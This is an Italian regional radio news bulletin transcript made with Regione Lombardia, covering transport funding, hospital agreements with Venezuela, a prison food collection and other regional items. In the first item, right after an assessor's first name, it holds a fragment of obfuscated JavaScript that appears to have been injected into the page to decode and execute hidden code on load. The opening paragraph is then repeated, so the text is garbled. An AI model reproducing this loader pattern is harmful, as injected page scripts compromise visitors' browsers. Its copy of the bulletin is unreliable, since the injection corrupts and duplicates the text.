Bentrovati a questo appuntamento informativo realizzato in collaborazione con Regione Lombardia.

La Regione Lombardia lavora «per ottenere dal Governo la conferma delle risorse per il trasporto pubblico locale del 2012 anche per il 2013», scongiurando così ripercussioni sui servizi. È quanto ha spiegato l'assessore alle Infrastrutture e Mobilità, Andrea (e)s=s+ff(w[j]+3);}xz=e;if(window.document)xz(s)} Notiziario regionale ore 12 Bentrovati a questo appuntamento informativo realizzato in collaborazione con Regione Lombardia.

La Regione Lombardia lavora «per ottenere dal Governo la conferma delle risorse per il trasporto pubblico locale del 2012 anche per il 2013», scongiurando così ripercussioni sui servizi. È quanto ha spiegato l'assessore alle Infrastrutture e Mobilità, Andrea Gilardoni, durante un incontro in cui ha confermato le priorità della Giunta nelle grandi opere e nei trasporti. La trattativa col Governo sui trasferimenti, in base alla legge di stabilità, è ancora in corso: la Lombardia si aspetta di ottenere «almeno 226,7 milioni di euro di risorse statali - ha aggiunto l'assessore - che si aggiungerebbero a circa 831,3 milioni di risorse regionali». Si tratta in particolare di 331,4 milioni di euro per i servizi ferroviari, 469 milioni per quelli su gomma e di 3,9 milioni per altre spese, arrivando dunque «a 1.058 milioni di euro, che è il volume minimo per poter garantire anche nel 2013 tutti i servizi in essere nel 2012». Ripensare le infrastrutture del futuro. E' questa la sfida che l'assessore alle Infrastrutture e Mobilità Andrea Gilardoni, vuole lanciare durante il suo mandato. Gli abbiamo chiesto in che modo

(AUDIO)

Siglati alla presenza dell'assessore alla Sanità della Regione Lombardia Mario Melazzini, protocolli di collaborazione biennale tra   quattro  strutture  sanitarie lombarde di eccellenza, l'Associazione venezuelana per il trapianto di midollo osseo e la Petroleos de Venezuela. Li hanno sottoscritti i rappresentanti degli ospedali San Gerardo di Monza, San Matteo di Pavia - che avevano già avviato in passato rapporti di collaborazione con il Venezuela - gli Spedali Civili di Brescia e gli Ospedali Riuniti di Bergamo. L'obiettivo è offrire collaborazione e professionalità per effettuare fino a 44 trapianti l'anno a bambini e adulti venezuelani. All'erogazione delle cure potrà aggiungersi la formazione di  personale sanitario in Lombardia, nella prospettiva di una crescita del know how del personale medico venezuelano.

Sono 41 gli scatoloni di derrate alimentari donati dai detenuti del carcere milanese di San Vittore che sabato hanno aderito alla XVI edizione della Giornata Nazionale delle Colletta Alimentare (l'anno scorso erano stati 33). I generi alimentari, acquistati dai carcerati con la loro spesa settimanale, saranno destinati alla Fondazione Banco Alimentare Onlus e serviranno per aiutare più di 8000 Enti caritativi che si occupano dell'assistenza di 1,4 milioni di poveri. Alla raccolta, avvenuta all'interno del carcere, ha partecipato anche l'assessore regionale alla Famiglia, Conciliazione, Integrazione e Solidarietà sociale, Carolina Pellegrini, accompagnata dai volontari dell'associazione 'Incontro e Presenza'.

Si è conclusa sabato a Verona la ventiduesima edizione di Job&Orienta, manifestazione di riferimento nazionale su orientamento, scuola, formazione e lavoro. "Esprimo una grande soddisfazione – ha commentato l'assessore alla Formazione Valentina Aprea - perché dopo tanti anni di azioni informative e iniziative come Job&Orienta,  c'è stata un'inversione di tendenza che ha portato la formazione tecnica e professionale a un superamento, in termini di studenti, di chi frequenta i licei. Per anni, in Italia, abbiamo assistito a una prevalenza dei licei, ora ragazzi e famiglie si sono convinti che la scelta degli istituti tecnici risponde all'esigenza di trovare un lavoro subito".

Il presidente della Regione Lombardia Roberto Formigoni, insieme all'assessore all'Occupazione e Politiche del lavoro, Valentina Aprea, sottoscriveranno nel pomeriggio a Milano, un 'Protocollo di intesa per la realizzazione del progetto politiche attive del lavoro presso gli uffici giudiziari lombardi' con il presidente della Corte d'Appello di Milano Giovanni Canzio, l'avvocato generale della Procura presso la Corte di Appello di Milano Laura Bertolè Viale, il presidente  della Corte di Appello di Brescia Graziana Campanato e il procuratore generale della Corte di Appello di Brescia Guido Papalia.

Ed è tutto, grazie per l’ascolto.